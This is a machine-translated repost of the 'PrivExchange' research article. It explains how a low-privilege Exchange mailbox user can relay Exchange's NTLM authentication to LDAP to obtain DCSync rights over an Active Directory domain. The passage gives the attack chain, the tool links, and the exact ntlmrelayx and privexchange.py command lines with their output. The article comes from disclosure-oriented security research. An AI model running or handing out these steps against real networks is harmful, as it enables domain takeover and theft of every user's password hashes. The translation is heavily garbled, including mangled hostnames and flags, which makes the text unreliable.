Ship new releases of Exchange Server to mention the right vulnerability analysis-vulnerability warning-the black bar safety net

In the majority of the use of Active Directory and Exchange Organization, Exchange servers typically have very high permissions on the Exchange Server administrators can upgrade to a domain administrator. I recently read a report from ZDI articles(CVE-2018-8581 technical details of its use), which details a via HTTP using NTLM to the attacker to exchange the authentication method. But I think vulnerability is more than that, we can also use it with NTLM relay attacks combined, so that the user can lower the permissions(any users with mailboxes)mention the rights to the domain administrator. In the default case, I’ve seen the use of the Exchange organization has a 90%will be subject to the threat of attack, and I wrote this article when there is no corresponding patch, temporarily can only be through a number of mitigation measures to prevent this privilege escalation. This article describes in detail the method of attack, some of the more technical details and the corresponding mitigation measures, as well as POC. I will present the attack as”PrivExchange”

By new combinations of known vulnerabilities
This article will some of the known vulnerabilities and the known Protocol weakness combined into a new attack method. A total of 3 sections combined, can be from a low-Rights provide the right to(any users with mailboxes)to the domain administrator access permissions:
By default, Exchange Server has too high of permissions
NTLM authentication is vulnerable to relay attack
Exchange has a feature that you can use the Exchange Server’s computer account to the attacker authenticate

First, the exchange and higher authority
Here the main vulnerability is the Exchange in the Active Directory domain that has high privileges. The Exchange Windows Permissions group can be WriteDacl permissions to access Active Directory in the Domain object, which allows the group to any members of the Modify domain permissions, including the implementation of DCSync operation permissions. With this permission a user or computer can perform the domain controller typically used for replication the synchronous operation, which allows the attacker to synchronize the Active Directory in the all users hash passwords. Some researchers have introduced this see the end of the article the reference section, and my last year with my Fox-IT colleagues Rindert together wrote this article. In that article, I also publish on ntlmrelayx update(https://github.com/SecureAuthCorp/impacket/blob/master/examples/ntlmrelayx.py), which increases in the NTLM relay when the implementation of these based on the Access Control List(ACL)of the attacks.

NTLM relay attacks
NTLM relay attacks are not a new attack technique. Previously, our main concern is via SMB forwards NTLM authentication, in order to in the other host on the executing code. But unfortunately, most of the company network and are not enabled for SMB signing, and therefore we cannot by this method of attack. But we can try the other protocols, other protocols are also vulnerable to relay attacks. In my opinion, the most interesting Protocol is LDAP, it can be used to read and modify the(Active)Directory object. You can access the link to review the NTLM relay attacks(https://www.fox-it.com/en/insights/blogs/blog/inside-windows-network/ a). A simple attack process is, in the absence of the relevant configuration to block the attack of the case, we can through the Windows(or automatically)to the attacker’s computer is connected to the network in the other computer when executed(automatically)authentication, as shown below:
! [](/Article/UploadPic/2019-1/201912514259340. png)
When the authentication to LDAP this step, you can modify the Directory object to grant an attacker permission, including DCSync the desired operation permissions.
Therefore, if we can make the Exchange Server by using NTLM authentication to us for authentication, we can perform ACL attack. Note that only when the victim via HTTP and not via SMB to our authenticate to relay to the LDAP. In the technical details section in detail）

Let the Exchange be authenticated
So far, the only missing part is to make the Exchange for us to authenticate in a simple way. ZDI researcher found that by Exchange PushSubscription functions of the Exchange via HTTP to any URL for authentication. In their article(https://www.thezdi.com/blog/2018/12/19/an-insincere-form-of-flattery-impersonating-users-on-microsoft-exchange) they use this vulnerability the NTLM authentication is relayed back to the Exchange(this is called a reflection attack)and impersonate other users. If we combine this with the default Exchange with the high permission combination and the implementation of the relay attack rather than a reflection attack, we can use these permissions to grant yourself DCSync permissions. The push notification service has an option, i.e., every X minutes a message is sent(the attacker can specify X), even without the occurrence of any event, even if the Inbox is not a new letter, you can also ensure that the Exchange is connected to us.

Perform a privilege elevation attack
The following shows the attack of a schematic diagram, showing for upgrade permission and perform the steps of:
! [](/Article/UploadPic/2019-1/201912514259776. png)
We need two tools to perform the attack, privexchange.py(https://github.com/dirkjanm/privexchange/)andntlmrelayx(https://github.com/SecureAuthCorp/impacket/ a). To the domain controller on the LDAP as the target, in the relay mode starts ntlmrelayx, the attacker the control of the ntu user to provide the right Operation:
ntlmrelayx.py -t ldap://s2016dc. testsegment. local-and escalate-user ntu
Now we run privexchange. py script:
user@localhost:~/exchpoc$ python privexchange.py -ah dev. testsegment. local s2012exc. testsegment. local-u-ntu-d testsegment. local
Password:
INFO: Using attacker URL: http://dev.testsegment.local/privexchange/
INFO: Exchange returned an HTTP status 200 - authentication was OK
ERROR: The user you authenticated with does not have a mailbox associated. Try a different user.
When there is no mailbox for the user to run together, we will receive the above error. We try again with a mailbox user:
user@localhost:~/exchpoc$ python privexchange.py -ah dev. testsegment. local s2012exc. testsegment. local-u testuser-d testsegment. local
Password:
INFO: Using attacker URL: http://dev.testsegment.local/privexchange/
INFO: Exchange returned an HTTP status 200 - authentication was OK
INFO: the API call was successful
After a minute(we set the value of), we see ntlmrelayx connection, it provide our users with DCSync permissions:
! [](/Article/UploadPic/2019-1/201912514259407. png)

[1] [2] [3] next